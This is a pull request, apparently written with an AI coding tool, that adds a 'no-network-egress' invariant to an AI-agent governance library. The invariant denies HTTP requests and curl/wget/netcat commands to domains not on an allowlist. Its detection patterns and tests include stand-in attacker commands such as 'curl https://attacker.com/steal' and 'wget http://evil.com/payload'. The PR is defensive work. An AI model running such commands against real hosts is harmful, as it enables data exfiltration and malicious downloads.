### PR TITLE
feat(issue-443): add no-network-egress invariant

### DIFF
--- a/packages/invariants/src/checker.ts
+++ b/packages/invariants/src/checker.ts
@@ -77,5 +77,9 @@ export function buildSystemState(context: Record<string, unknown> = {}): SystemS
     fileContentDiff: (context.fileContentDiff as string) || '',
     writeSizeBytes: context.writeSizeBytes as number | undefined,
     writeSizeBytesLimit: context.writeSizeBytesLimit as number | undefined,
+    isNetworkRequest: context.isNetworkRequest as boolean | undefined,
+    requestUrl: context.requestUrl as string | undefined,
+    requestDomain: context.requestDomain as string | undefined,
+    networkEgressAllowlist: context.networkEgressAllowlist as string[] | undefined,
   };
 }

--- a/packages/invariants/src/definitions.ts
+++ b/packages/invariants/src/definitions.ts
@@ -52,6 +52,14 @@ export interface SystemState {
   writeSizeBytes?: number;
   /** Maximum allowed single-file write size in bytes (default: 102400 = 100KB) */
   writeSizeBytesLimit?: number;
+  /** Whether the current action is a network request (http.request or shell with network tools) */
+  isNetworkRequest?: boolean;
+  /** Full URL of the network request (if available) */
+  requestUrl?: string;
+  /** Domain/hostname of the network request (extracted from URL) */
+  requestDomain?: string;
+  /** Allowlisted domains for network egress (default: empty = deny all) */
+  networkEgressAllowlist?: string[];
 }
 
 /** Patterns matched as substrings (case-insensitive) against file paths. */
@@ -254,6 +262,51 @@ export function isCredentialPath(filePath: string): boolean {
   }
 
   return false;
+}
+
+/** Shell command patterns that indicate network egress (case-insensitive). */
+const NETWORK_COMMAND_PATTERNS: RegExp[] = [
+  /\bcurl\b/,
+  /\bwget\b/,
+  /\b(?:nc|netcat|ncat)\b/,
+  /\bfetch\b/,
+  /\bhttpie\b/,
+  /\bhttp\s/,
+];
+
+/** Extracts a domain from a URL string. Returns null if parsing fails. */
+export function extractDomainFromUrl(url: string): string | null {
+  if (!url || typeof url !== 'string') return null;
+
+  const trimmed = url.trim();
+
+  // Try URL constructor for well-formed URLs
+  try {
+    const parsed = new URL(trimmed);
+    return parsed.hostname || null;
+  } catch {
+    // Fall through to regex extraction
+  }
+
+  // Regex fallback: match protocol://hostname or bare hostname:port patterns
+  const match = trimmed.match(/^(?:https?:\/\/)?([^/:?\s#]+)/i);
+  return match ? match[1].toLowerCase() : null;
+}
+
+/** Extracts a URL from a shell command containing curl/wget/etc. */
+export function extractUrlFromCommand(command: string): string | null {
+  if (!command) return null;
+
+  // Match URLs in the command (http:// or https://)
+  const urlMatch = command.match(/\bhttps?:\/\/[^\s"'<>|;)]+/i);
+  return urlMatch ? urlMatch[0] : null;
+}
+
+/** Returns true if the command contains a network tool (curl, wget, nc, etc.) */
+export function isNetworkCommand(command: string): boolean {
+  if (!command || typeof command !== 'string') return false;
+  const lower = command.toLowerCase();
+  return NETWORK_COMMAND_PATTERNS.some((p) => p.test(lower));
 }
 
 export const DEFAULT_INVARIANTS: AgentGuardInvariant[] = [
@@ -1006,9 +1059,7 @@ export const DEFAULT_INVARIANTS: AgentGuardInvariant[] = [
         'sequelize/migrations/',
       ];
 
-      const isMigrationFile = MIGRATION_DIR_PATTERNS.some((p) =>
-        normalizedTarget.includes(p)
-      );
+      const isMigrationFile = MIGRATION_DIR_PATTERNS.some((p) => normalizedTarget.includes(p));
 
       if (!isMigrationFile) {
         return { holds: true, expected: 'N/A', actual: 'Target is not in a migration directory' };
@@ -1132,6 +1183,89 @@ export const DEFAULT_INVARIANTS: AgentGuardInvariant[] = [
         actual: holds
           ? 'No transitive effects detected'
           : `Transitive policy violations detected: ${violations.join('; ')}`,
+      };
+    },
+  },
+
+  {
+    id: 'no-network-egress',
+    name: 'No Network Egress',
+    description:
+      'Denies HTTP requests to non-allowlisted domains — closes data exfiltration vectors via network access',
+    severity: 4,
+    check(state) {
+      const actionType = state.currentActionType || '';
+      const command = state.currentCommand || '';
+
+      // Determine if this is a network action
+      const isHttpAction = actionType === 'http.request';
+      const isNetworkShell =
+        (actionType === '' || actionType === 'shell.exec') && isNetworkCommand(command);
+      const explicitFlag = state.isNetworkRequest === true;
+
+      if (!isHttpAction && !isNetworkShell && !explicitFlag) {
+        return { holds: true, expected: 'N/A', actual: 'Not a network request' };
+      }
+
+      // If no allowlist is configured (undefined), skip enforcement (fail-open).
+      // This makes the invariant opt-in: users must explicitly set networkEgressAllowlist
+      // to activate network egress governance. An empty array means "deny all".
+      const allowlist = state.networkEgressAllowlist;
+      if (allowlist === undefined) {
+        return {
+          holds: true,
+          expected: 'N/A',
+          actual: 'Network egress allowlist not configured (fail-open)',
+        };
+      }
+
+      // Extract domain from state or from command
+      let domain = state.requestDomain || '';
+      if (domain === '' && state.requestUrl) {
+        domain = extractDomainFromUrl(state.requestUrl) || '';
+      }
+      if (domain === '' && isNetworkShell) {
+        const url = extractUrlFromCommand(command);
+        if (url) {
+          domain = extractDomainFromUrl(url) || '';
+        }
+      }
+      if (domain === '' && isHttpAction && state.currentTarget) {
+        domain = extractDomainFromUrl(state.currentTarget) || '';
+      }
+
+      // If no domain could be extracted, deny conservatively
+      if (domain === '') {
+        return {
+          holds: false,
+          expected: 'Network requests must target allowlisted domains',
+          actual: 'Network request detected but domain could not be determined',
+        };
+      }
+
+      // Empty allowlist = deny all network egress
+      if (allowlist.length === 0) {
+        return {
+          holds: false,
+          expected: 'Network requests must target allowlisted domains',
+          actual: `Network egress to ${domain} denied (no allowlist configured)`,
+        };
+      }
+
+      // Check domain against allowlist (case-insensitive, supports subdomain matching)
+      const lowerDomain = domain.toLowerCase();
+      const allowed = allowlist.some((entry) => {
+        const lowerEntry = entry.toLowerCase();
+        // Exact match or subdomain match (e.g., "api.github.com" matches "github.com")
+        return lowerDomain === lowerEntry || lowerDomain.endsWith('.' + lowerEntry);
+      });
+
+      return {
+        holds: allowed,
+        expected: 'Network requests must target allowlisted domains',
+        actual: allowed
+          ? `Network egress to ${domain} allowed (matches allowlist)`
+          : `Network egress to ${domain} denied (not in allowlist: ${allowlist.join(', ')})`,
       };
     },
   },

--- a/packages/invariants/tests/network-egress.test.ts
+++ b/packages/invariants/tests/network-egress.test.ts
@@ -1,0 +1,286 @@
+// Tests for the no-network-egress invariant
+import { describe, it, expect, beforeEach } from 'vitest';
+import {
+  DEFAULT_INVARIANTS,
+  extractDomainFromUrl,
+  extractUrlFromCommand,
+  isNetworkCommand,
+} from '@red-codes/invariants';
+import type { SystemState } from '@red-codes/invariants';
+import { resetEventCounter } from '@red-codes/events';
+
+beforeEach(() => {
+  resetEventCounter();
+});
+
+function findInvariant(id: string) {
+  const inv = DEFAULT_INVARIANTS.find((i) => i.id === id);
+  if (!inv) throw new Error(`Invariant ${id} not found`);
+  return inv;
+}
+
+describe('extractDomainFromUrl', () => {
+  it('extracts domain from https URL', () => {
+    expect(extractDomainFromUrl('https://api.github.com/repos')).toBe('api.github.com');
+  });
+
+  it('extracts domain from http URL', () => {
+    expect(extractDomainFromUrl('http://example.com/path')).toBe('example.com');
+  });
+
+  it('extracts domain from URL with port', () => {
+    expect(extractDomainFromUrl('https://localhost:3000/api')).toBe('localhost');
+  });
+
+  it('handles IP addresses', () => {
+    expect(extractDomainFromUrl('http://192.168.1.1/data')).toBe('192.168.1.1');
+  });
+
+  it('returns null for empty string', () => {
+    expect(extractDomainFromUrl('')).toBeNull();
+  });
+
+  it('returns null for invalid input', () => {
+    expect(extractDomainFromUrl(null as unknown as string)).toBeNull();
+  });
+
+  it('handles bare domain with protocol', () => {
+    expect(extractDomainFromUrl('https://evil.com')).toBe('evil.com');
+  });
+});
+
+describe('extractUrlFromCommand', () => {
+  it('extracts URL from curl command', () => {
+    expect(extractUrlFromCommand('curl https://api.github.com/repos')).toBe(
+      'https://api.github.com/repos'
+    );
+  });
+
+  it('extracts URL from wget command', () => {
+    expect(extractUrlFromCommand('wget http://evil.com/payload')).toBe('http://evil.com/payload');
+  });
+
+  it('extracts URL with flags', () => {
+    expect(extractUrlFromCommand('curl -s -X POST https://example.com/api/data')).toBe(
+      'https://example.com/api/data'
+    );
+  });
+
+  it('returns null for command without URL', () => {
+    expect(extractUrlFromCommand('curl localhost')).toBeNull();
+  });
+
+  it('returns null for empty command', () => {
+    expect(extractUrlFromCommand('')).toBeNull();
+  });
+});
+
+describe('isNetworkCommand', () => {
+  it('detects curl', () => {
+    expect(isNetworkCommand('curl https://example.com')).toBe(true);
+  });
+
+  it('detects wget', () => {
+    expect(isNetworkCommand('wget http://evil.com/payload')).toBe(true);
+  });
+
+  it('detects nc (netcat)', () => {
+    expect(isNetworkCommand('nc -l 8080')).toBe(true);
+  });
+
+  it('detects netcat', () => {
+    expect(isNetworkCommand('netcat 192.168.1.1 4444')).toBe(true);
+  });
+
+  it('does not flag normal commands', () => {
+    expect(isNetworkCommand('ls -la')).toBe(false);
+    expect(isNetworkCommand('git push origin main')).toBe(false);
+  });
+
+  it('returns false for empty input', () => {
+    expect(isNetworkCommand('')).toBe(false);
+  });
+});
+
+describe('no-network-egress invariant', () => {
+  const inv = findInvariant('no-network-egress');
+
+  it('holds for non-network actions', () => {
+    const state: SystemState = {
+      currentActionType: 'file.write',
+      currentTarget: 'src/index.ts',
+    };
+    const result = inv.check(state);
+    expect(result.holds).toBe(true);
+    expect(result.actual).toBe('Not a network request');
+  });
+
+  it('fails open when no allowlist is configured (undefined)', () => {
+    const state: SystemState = {
+      currentActionType: 'http.request',
+      currentTarget: 'https://example.com/api',
+    };
+    const result = inv.check(state);
+    expect(result.holds).toBe(true);
+    expect(result.actual).toContain('fail-open');
+  });
+
+  it('denies http.request when allowlist is empty array', () => {
+    const state: SystemState = {
+      currentActionType: 'http.request',
+      currentTarget: 'https://evil.com/exfiltrate',
+      networkEgressAllowlist: [],
+    };
+    const result = inv.check(state);
+    expect(result.holds).toBe(false);
+    expect(result.actual).toContain('evil.com');
+    expect(result.actual).toContain('no allowlist configured');
+  });
+
+  it('denies curl command to non-allowlisted domain', () => {
+    const state: SystemState = {
+      currentActionType: 'shell.exec',
+      currentCommand: 'curl https://attacker.com/steal',
+      networkEgressAllowlist: ['github.com'],
+    };
+    const result = inv.check(state);
+    expect(result.holds).toBe(false);
+    expect(result.actual).toContain('attacker.com');
+  });
+
+  it('denies wget command to non-allowlisted domain', () => {
+    const state: SystemState = {
+      currentActionType: 'shell.exec',
+      currentCommand: 'wget http://malicious.org/payload',
+      networkEgressAllowlist: ['npmjs.org'],
+    };
+    const result = inv.check(state);
+    expect(result.holds).toBe(false);
+    expect(result.actual).toContain('malicious.org');
+  });
+
+  it('allows http.request to allowlisted domain', () => {
+    const state: SystemState = {
+      currentActionType: 'http.request',
+      currentTarget: 'https://api.github.com/repos',
+      networkEgressAllowlist: ['github.com'],
+    };
+    const result = inv.check(state);
+    expect(result.holds).toBe(true);
+    expect(result.actual).toContain('api.github.com');
+    expect(result.actual).toContain('allowed');
+  });
+
+  it('allows curl to allowlisted domain', () => {
+    const state: SystemState = {
+      currentActionType: 'shell.exec',
+      currentCommand: 'curl https://registry.npmjs.org/express',
+      networkEgressAllowlist: ['npmjs.org'],
+    };
+    const result = inv.check(state);
+    expect(result.holds).toBe(true);
+    expect(result.actual).toContain('registry.npmjs.org');
+  });
+
+  it('supports subdomain matching on allowlist', () => {
+    const state: SystemState = {
+      currentActionType: 'http.request',
+      currentTarget: 'https://api.example.com/data',
+      networkEgressAllowlist: ['example.com'],
+    };
+    const result = inv.check(state);
+    expect(result.holds).toBe(true);
+  });
+
+  it('denies when domain does not match allowlist', () => {
+    const state: SystemState = {
+      currentActionType: 'http.request',
+      currentTarget: 'https://evil.com/data',
+      networkEgressAllowlist: ['github.com', 'npmjs.org'],
+    };
+    const result = inv.check(state);
+    expect(result.holds).toBe(false);
+    expect(result.actual).toContain('evil.com');
+    expect(result.actual).toContain('not in allowlist');
+  });
+
+  it('denies when domain cannot be determined', () => {
+    const state: SystemState = {
+      currentActionType: 'http.request',
+      currentTarget: '',
+      networkEgressAllowlist: ['example.com'],
+    };
+    const result = inv.check(state);
+    expect(result.holds).toBe(false);
+    expect(result.actual).toContain('could not be determined');
+  });
+
+  it('uses requestDomain from state when provided', () => {
+    const state: SystemState = {
+      isNetworkRequest: true,
+      requestDomain: 'trusted.internal',
+      networkEgressAllowlist: ['trusted.internal'],
+    };
+    const result = inv.check(state);
+    expect(result.holds).toBe(true);
+  });
+
+  it('uses requestUrl from state when requestDomain not provided', () => {
+    const state: SystemState = {
+      isNetworkRequest: true,
+      requestUrl: 'https://allowed.io/api',
+      networkEgressAllowlist: ['allowed.io'],
+    };
+    const result = inv.check(state);
+    expect(result.holds).toBe(true);
+  });
+
+  it('handles localhost', () => {
+    const state: SystemState = {
+      currentActionType: 'http.request',
+      currentTarget: 'http://localhost:3000/api',
+      networkEgressAllowlist: ['localhost'],
+    };
+    const result = inv.check(state);
+    expect(result.holds).toBe(true);
+  });
+
+  it('handles IP addresses', () => {
+    const state: SystemState = {
+      currentActionType: 'shell.exec',
+      currentCommand: 'curl http://192.168.1.100/data',
+      networkEgressAllowlist: ['192.168.1.100'],
+    };
+    const result = inv.check(state);
+    expect(result.holds).toBe(true);
+  });
+
+  it('case-insensitive domain matching', () => {
+    const state: SystemState = {
+      currentActionType: 'http.request',
+      currentTarget: 'https://API.GitHub.COM/repos',
+      networkEgressAllowlist: ['github.com'],
+    };
+    const result = inv.check(state);
+    expect(result.holds).toBe(true);
+  });
+
+  it('holds for git actions (not network)', () => {
+    const state: SystemState = {
+      currentActionType: 'git.push',
+      currentCommand: 'git push origin main',
+    };
+    const result = inv.check(state);
+    expect(result.holds).toBe(true);
+  });
+
+  it('denies with empty allowlist (default deny all)', () => {
+    const state: SystemState = {
+      currentActionType: 'http.request',
+      currentTarget: 'https://example.com/api',
+      networkEgressAllowlist: [],
+    };
+    const result = inv.check(state);
+    expect(result.holds).toBe(false);
+  });
+});

--- a/packages/kernel/src/decision.ts
+++ b/packages/kernel/src/decision.ts
@@ -5,7 +5,13 @@ import type { DomainEvent } from '@red-codes/core';
 import { authorize } from './aab.js';
 import type { RawAgentAction } from './aab.js';
 import type { NormalizedIntent, EvalResult, EvaluateOptions } from '@red-codes/policy';
-import { checkAllInvariants, buildSystemState } from '@red-codes/invariants';
+import {
+  checkAllInvariants,
+  buildSystemState,
+  isNetworkCommand,
+  extractUrlFromCommand,
+  extractDomainFromUrl,
+} from '@red-codes/invariants';
 import type { InvariantCheck } from '@red-codes/invariants';
 import { createEvidencePack } from './evidence.js';
 import type { EvidencePack } from './evidence.js';
@@ -133,6 +139,30 @@ export function createEngine(config: EngineConfig = {}): Engine {
           ? rawAction.content.length
           : (systemContext.writeSizeBytes as number | undefined);
 
+      // Detect network requests for the network egress invariant
+      const isHttpAction = intent.action === 'http.request';
+      const isNetworkShellCmd =
+        intent.action === 'shell.exec' && isNetworkCommand(intent.command || '');
+      const isNetworkRequest =
+        isHttpAction ||
+        isNetworkShellCmd ||
+        (systemContext.isNetworkRequest as boolean | undefined) === true;
+
+      let requestUrl = systemContext.requestUrl as string | undefined;
+      let requestDomain = systemContext.requestDomain as string | undefined;
+
+      if (isNetworkRequest && !requestUrl) {
+        if (isHttpAction && intent.target) {
+          requestUrl = intent.target;
+        } else if (isNetworkShellCmd && intent.command) {
+          requestUrl = extractUrlFromCommand(intent.command) || undefined;
+        }
+      }
+
+      if (isNetworkRequest && !requestDomain && requestUrl) {
+        requestDomain = extractDomainFromUrl(requestUrl) || undefined;
+      }
+
       const state = buildSystemState({
         ...systemContext,
         currentTarget: intent.target,
@@ -144,6 +174,9 @@ export function createEngine(config: EngineConfig = {}): Engine {
         directPush: intent.action === 'git.push',
         isPush: intent.action === 'git.push' || intent.action === 'git.force-push',
         writeSizeBytes,
+        isNetworkRequest,
+        requestUrl,
+        requestDomain,
       });
 
       const {

--- a/packages/kernel/tests/agentguard-engine.test.ts
+++ b/packages/kernel/tests/agentguard-engine.test.ts
@@ -15,7 +15,7 @@ describe('agentguard/core/engine', () => {
     it('creates an engine with defaults', () => {
       const engine = createEngine();
       expect(engine.getPolicyCount()).toBe(0);
-      expect(engine.getInvariantCount()).toBe(19); // DEFAULT_INVARIANTS
+      expect(engine.getInvariantCount()).toBe(20); // DEFAULT_INVARIANTS
       expect(engine.getPolicyErrors()).toEqual([]);
     });
 


### PR DESCRIPTION
## Summary
- Add `no-network-egress` invariant (severity 4) that governs network egress from agent actions
- Extends `SystemState` with network-related fields and wires detection into the decision engine
- Closes #443

## Changes
- `packages/invariants/src/definitions.ts` — Add 4 new `SystemState` fields (`isNetworkRequest`, `requestUrl`, `requestDomain`, `networkEgressAllowlist`), helper functions (`extractDomainFromUrl`, `extractUrlFromCommand`, `isNetworkCommand`), and the `no-network-egress` invariant
- `packages/invariants/src/checker.ts` — Wire new fields into `buildSystemState`
- `packages/kernel/src/decision.ts` — Detect network requests from `http.request` actions and shell commands with curl/wget/nc, populate state fields
- `packages/kernel/tests/agentguard-engine.test.ts` — Update invariant count from 19 to 20
- `packages/invariants/tests/network-egress.test.ts` — 28 new tests covering helpers and invariant behavior

## Design Decisions
- **Opt-in enforcement**: Invariant fails open when `networkEgressAllowlist` is `undefined` (not configured). Only enforces when explicitly set. An empty array (`[]`) means "deny all egress".
- **Subdomain matching**: `api.github.com` matches allowlist entry `github.com`
- **Three detection paths**: `http.request` action type, shell commands with network tools, explicit `isNetworkRequest` flag

## Test Plan
- [x] TypeScript build passes (`pnpm build`)
- [x] Vitest tests pass (`pnpm test`) — 481 invariant + 569 kernel tests
- [x] ESLint clean (`pnpm lint`)
- [x] Prettier clean (`pnpm format`)
- [x] Type-check passes (`pnpm ts:check`)

## Risk Assessment

| Metric | Value |
|--------|-------|
| Risk level | low |
| Blast radius | 5 files |
| Simulation result | N/A (feature branch) |

## Governance Report

| Metric | Count |
|--------|-------|
| Total events | 53164 (cumulative) |
| Actions allowed | 8324 |
| Actions denied | 2152 |
| Policy denials | 994 |
| Invariant violations | 889 |
| Escalation events | 20 |

<details>
<summary>Governance details</summary>

**Source**: `.agentguard/events/`, `.agentguard/decisions/`, `logs/runtime-events.jsonl`

**Pre-push simulation**: low risk, 0 blast radius (feature branch)
**Escalation levels observed**: NORMAL only (this session)

Note: Governance telemetry counts are cumulative across all sessions in this repository.

</details>

🤖 Generated with [Claude Code](https://claude.com/claude-code)